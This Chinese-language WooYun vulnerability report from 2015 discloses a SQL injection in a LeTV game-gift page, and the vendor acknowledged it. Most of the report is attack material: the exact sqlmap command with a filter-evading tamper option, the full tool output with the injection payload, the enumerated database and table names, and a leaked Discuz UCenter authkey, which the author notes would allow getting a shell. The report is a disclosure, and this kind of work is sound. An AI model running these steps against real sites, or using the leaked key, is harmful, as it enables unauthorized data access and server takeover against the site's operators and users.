当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0126236

漏洞标题:乐视网某站SQL注入导致泄漏多个数据库

相关厂商:乐视网

漏洞作者: 蓝冰

提交时间:2015-07-12 09:29

修复时间:2015-08-26 10:06

公开时间:2015-08-26 10:06

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-12: 细节已通知厂商并且等待厂商处理中
2015-07-12: 厂商已经确认,细节仅向厂商公开
2015-07-22: 细节向核心白帽子及相关领域专家公开
2015-08-01: 细节向普通白帽子公开
2015-08-11: 细节向实习白帽子公开
2015-08-26: 细节向公众公开

简要描述:

我又来了~

详细说明:

URL: http://libao.g.letv.com/?gid=116
注入参数sid

屏幕快照 2015-07-12 1.00.36.png


刚开始简单手工测试后直接仍SQLMAP 结果测试到time注入的时候网站挂掉了 应该是新手卡返回过多导致延迟时间成倍的增加 然后就崩掉了 后来修改一下SQLMAP的参数

sqlmap -r /root/post.txt --dbs -p sid --technique B --threads 1 --tamper=between


这样就只测试布尔盲注了 tamper=between 是因为过滤了大于小于符号

root@BlueIce:~# sqlmap -r /root/post.txt --dbs -p sid --technique B --threads 1 --tamper=between
    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 23:47:53
[23:47:53] [INFO] parsing HTTP request from '/root/post.txt'
[23:47:53] [INFO] loading tamper script 'between'
[23:47:58] [INFO] testing connection to the target URL
[23:47:59] [INFO] testing if the target URL is stable. This can take a couple of seconds
[23:48:01] [INFO] target URL is stable
[23:48:01] [WARNING] heuristic (basic) test shows that POST parameter 'sid' might not be injectable
[23:48:01] [INFO] testing for SQL injection on POST parameter 'sid'
[23:48:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[23:48:03] [INFO] POST parameter 'sid' is 'AND boolean-based blind - WHERE or HAVING clause' injectable 
[23:48:05] [INFO] checking if the injection point on POST parameter 'sid' is a false positive
POST parameter 'sid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
sqlmap identified the following injection points with a total of 17 HTTP(s) requests:
---
Place: POST
Parameter: sid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: sid=7509 AND 9095=9095
---
[23:48:07] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[23:48:07] [INFO] testing MySQL
[23:48:07] [INFO] confirming MySQL
[23:48:07] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.3
back-end DBMS: MySQL >= 5.0.0
[23:48:07] [INFO] fetching database names
[23:48:07] [INFO] fetching number of databases
[23:48:07] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[23:48:07] [INFO] retrieved: 4
[23:48:08] [INFO] retrieved: information_schema
[23:48:35] [INFO] retrieved: game_bbs
[23:48:46] [INFO] retrieved: tg_admin
[23:49:00] [INFO] retrieved: web_admin
available databases [4]:
[*] game_bbs
[*] information_schema
[*] tg_admin
[*] web_admin


game_bbs就是游戏论坛了 注出uckey

Database: game_bbs
Table: pre_ucenter_applications
[1 entry]
+-------+---------+------------------+---------------+---------+---------+---------+------------------------------------------------------------------+----------+----------+----------+-----------+------------+-------------+--------------+
| appid | ip      | url              | name          | type    | extra   | charset | authkey                                                          | recvnote | synlogin | allowips | dbcharset | viewprourl | apifilename | tagtemplates |
+-------+---------+------------------+---------------+---------+---------+---------+------------------------------------------------------------------+----------+----------+----------+-----------+------------+-------------+--------------+
| 1     | <blank> | http://bbs.ha.cc | Discuz! Board | DISCUZX | <blank> | <blank> | u0b8wfw1Wfd2t09ey0b4k87fY4Q0d4sfq2iaI4Uck8M4WbdeScO9i0I0Ier0Q6zf | 1        | 1        | <blank>  | <blank>   | <blank>    | uc.php      | <blank>      |
+-------+---------+------------------+---------------+---------+---------+---------+------------------------------------------------------------------+----------+----------+----------+-----------+------------+-------------+--------------+


有了uckey 就可以getshell了 不过发现论坛貌似在维护中?什么功能都用不了 访问任意php文件都是403错误
下面的是web_admin库 应该是有关游戏的

root@BlueIce:~# sqlmap -r /root/post.txt -D web_admin --tables  -p sid --technique B --threads 1 --tamper=between 
    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 00:38:49
[00:38:49] [INFO] parsing HTTP request from '/root/post.txt'
[00:38:49] [INFO] loading tamper script 'between'
[00:38:49] [INFO] resuming back-end DBMS 'mysql' 
[00:38:54] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: sid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: sid=7509 AND 9095=9095
---
[00:38:54] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[00:38:54] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.3
back-end DBMS: MySQL 5
[00:38:54] [INFO] fetching tables for database: 'web_admin'
[00:38:54] [INFO] fetching number of tables for database 'web_admin'
[00:38:54] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[00:38:54] [INFO] retrieved: 24
[00:38:56] [INFO] retrieved: yg_admins_resources
[00:39:21] [INFO] retrieved: yg_category
[00:39:33] [INFO] retrieved: yg_email_user
[00:39:47] [INFO] retrieved: yg_games
[00:39:55] [INFO] retrieved: yg_gameweb_info
[00:40:07] [INFO] retrieved: yg_guest_info
[00:40:20] [INFO] retrieved: yg_guest_logined_user_relation
[00:40:48] [INFO] retrieved: yg_guest_user_relation
[00:41:07] [INFO] retrieved: yg_lastest_togame
[00:41:27] [INFO] retrieved: yg_lb_cards
[00:41:38] [INFO] retrieved: yg_lb_cate
[00:41:43] [INFO] retrieved: yg_lb_info
[00:41:50] [INFO] retrieved: yg_news
[00:41:57] [INFO] retrieved: yg_orders_log
[00:42:11] [INFO] retrieved: yg_pay_log
[00:42:21] [INFO] retrieved: yg_pic
[00:42:26] [INFO] retrieved: yg_resources
[00:42:39] [INFO] retrieved: yg_role
[00:42:44] [INFO] retrieved: yg_role_resources
[00:42:59] [INFO] retrieved: yg_servers
[00:43:09] [INFO] retrieved: yg_system_admins
[00:43:26] [INFO] retrieved: yg_togame_log
[00:43:40] [INFO] retrieved: yg_user_info
[00:43:52] [INFO] retrieved: yg_user_map
Database: web_admin
[24 tables]
+--------------------------------+
| yg_admins_resources            |
| yg_category                    |
| yg_email_user                  |
| yg_games                       |
| yg_gameweb_info                |
| yg_guest_info                  |
| yg_guest_logined_user_relation |
| yg_guest_user_relation         |
| yg_lastest_togame              |
| yg_lb_cards                    |
| yg_lb_cate                     |
| yg_lb_info                     |
| yg_news                        |
| yg_orders_log                  |
| yg_pay_log                     |
| yg_pic                         |
| yg_resources                   |
| yg_role                        |
| yg_role_resources              |
| yg_servers                     |
| yg_system_admins               |
| yg_togame_log                  |
| yg_user_info                   |
| yg_user_map                    |
+--------------------------------+

漏洞证明:

已证明

修复方案:

过滤吧 嘿嘿 : )

版权声明:转载请注明来源 蓝冰@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-07-12 10:04

厂商回复:

感谢蓝冰!关注乐视安全,已安排人员进行修复。

最新状态:

暂无